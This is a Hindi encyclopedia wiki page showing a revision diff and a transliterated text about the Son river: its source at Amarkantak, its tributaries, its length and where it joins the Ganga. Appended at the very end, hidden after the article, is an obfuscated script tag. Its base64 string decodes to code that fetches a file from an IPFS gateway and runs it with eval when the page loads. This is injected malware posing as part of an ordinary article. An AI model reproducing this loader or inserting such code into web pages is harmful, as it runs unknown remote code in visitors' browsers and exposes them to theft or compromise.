Difference between revisions of "सोन नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(14 intermediate revisions by 6 users not shown)
Line 1: Line 1:
*यह नदी अमरकंटक की पहाड़ियों में [[नर्मदा नदी|नर्मदा]] के उदगम स्थल के निकट शोषाकुण्ड नामक स्थान से निकलती है।  
+
'''सोन नदी''' का [[उदगम]] मैकाल पर्वत के [[अमरकण्टक]] नामक पठारी भाग से है। इसे 'सोनभद्र' के नाम से पुकारा जाता है। सोन नदी का एक अन्य नाम 'हिरण्यवाह' भी है। यह नदी [[झारखण्ड]] के उत्तरी-पश्चिमी छोर पर सीमा का निर्माण करती है। सोन नदी [[पलामू]] की उत्तरी सीमा बनाती हुई प्रवाहित होती है। इस नदी के उदगम को अरीय अपवाह प्रतिरूप का एक बढ़िया उदाहरण माना जाता है, क्योंकि [[अमरकण्टक]] से सोन के साथ अन्य दिशाओं में [[नर्मदा]] भी निकलती है।
*इसकी अनेक सहायक नदियाँ हैं, जिसमें दो मुख्य हैं।
 
**रिहन्द
 
**कुनहड
 
*यह नदी [[मिर्जापुर ज़िला|मिर्जापुर]] ज़िले के दक्षिणी भाग से प्रवाहित होती है और [[पाटलिपुत्र|पटना]] से पहले दीनापुर से 16 किमी॰ ऊपर [[गंगा नदी]] से मिल जाती है।
 
*इसकी कुल लम्बाई 780 किमी॰ है।
 
  
 +
*सोन घाटी भौगर्भिक तौर पर दक्षिण-पश्चिम में नर्मदा नदी घाटी का लगभग अनवरत विस्तार है।
 +
*यह [[गंगा नदी|गंगा]] की प्रमुख दक्षिणी सहायक नदी है, जिसका उदगम स्थल [[मध्य प्रदेश]] राज्य में है।
 +
*इस नदी के किनारे का ज़्यादातर हिस्सा वनाच्छादित है, जहाँ जनसंख्या का निवास काफ़ी कम है।
 +
*सोन नदी की घाटी [[कैमूर पहाड़ियाँ|कैमूर पर्वतश्रेणी]] (उत्तर) और [[छोटा नागपुर]] (दक्षिण) से घिरी हुई है।
 +
*मौसमी (बरसाती) नदी होने के कारण यह परिवहन की दृष्टि से महत्त्वहीन है।
 +
*इस नदी की अनेक सहायक नदियाँ हैं, जिसमें [[रिहन्द नदी|रिहन्द]] और कुनहड मुख्य हैं।
 +
*सोन नदी मानपुर तक उत्तर की ओर बहने के बाद पूर्वोतर दिशा में मुड़ती जाती है।
 +
*यह नदी [[मिर्ज़ापुर]] ज़िले के दक्षिणी भाग से प्रवाहित होती है और [[पाटलिपुत्र|पटना]] से पहले दीनापुर से 16 किलोमीटर ऊपर [[गंगा नदी]] से मिल जाती है।
 +
*इस नदी की कुल लम्बाई 780 किलोमीटर है।
 +
*सोन नदी की कुछ सहायक नदियों पर बांध बनाए गए है और [[उत्तर प्रदेश]] में 'डेहरी ऑन सोन नहर प्रणाली' के आरंभिक स्थल है।
 +
 +
==संबंधित लेख==
 +
{{झारखण्ड की नदियाँ}}
 +
{{भारत की नदियाँ}}
 +
[[Category:झारखण्ड की नदियाँ]][[Category:भारत_की_नदियाँ]][[Category:भूगोल_कोश]][[Category:उत्तर_प्रदेश_की_नदियाँ]]
  
[[Category:भारत_की_नदियाँ]]
 
[[Category:भूगोल_कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 14:00, 24 November 2011

son nadi ka udagam maikal parvat ke amarakantak namak pathari bhag se hai. ise 'sonabhadr' ke nam se pukara jata hai. son nadi ka ek any nam 'hiranyavah' bhi hai. yah nadi jharakhand ke uttari-pashchimi chhor par sima ka nirman karati hai. son nadi palamoo ki uttari sima banati huee pravahit hoti hai. is nadi ke udagam ko ariy apavah pratiroop ka ek badhiya udaharan mana jata hai, kyoanki amarakantak se son ke sath any dishaoan mean narmada bhi nikalati hai.

  • son ghati bhaugarbhik taur par dakshin-pashchim mean narmada nadi ghati ka lagabhag anavarat vistar hai.
  • yah ganga ki pramukh dakshini sahayak nadi hai, jisaka udagam sthal madhy pradesh rajy mean hai.
  • is nadi ke kinare ka zyadatar hissa vanachchhadit hai, jahaan janasankhya ka nivas kafi kam hai.
  • son nadi ki ghati kaimoor parvatashreni (uttar) aur chhota nagapur (dakshin) se ghiri huee hai.
  • mausami (barasati) nadi hone ke karan yah parivahan ki drishti se mahattvahin hai.
  • is nadi ki anek sahayak nadiyaan haian, jisamean rihand aur kunahad mukhy haian.
  • son nadi manapur tak uttar ki or bahane ke bad poorvotar disha mean mu dati jati hai.
  • yah nadi mirzapur zile ke dakshini bhag se pravahit hoti hai aur patana se pahale dinapur se 16 kilomitar oopar ganga nadi se mil jati hai.
  • is nadi ki kul lambaee 780 kilomitar hai.
  • son nadi ki kuchh sahayak nadiyoan par baandh banae ge hai aur uttar pradesh mean 'dehari aaun son nahar pranali' ke aranbhik sthal hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>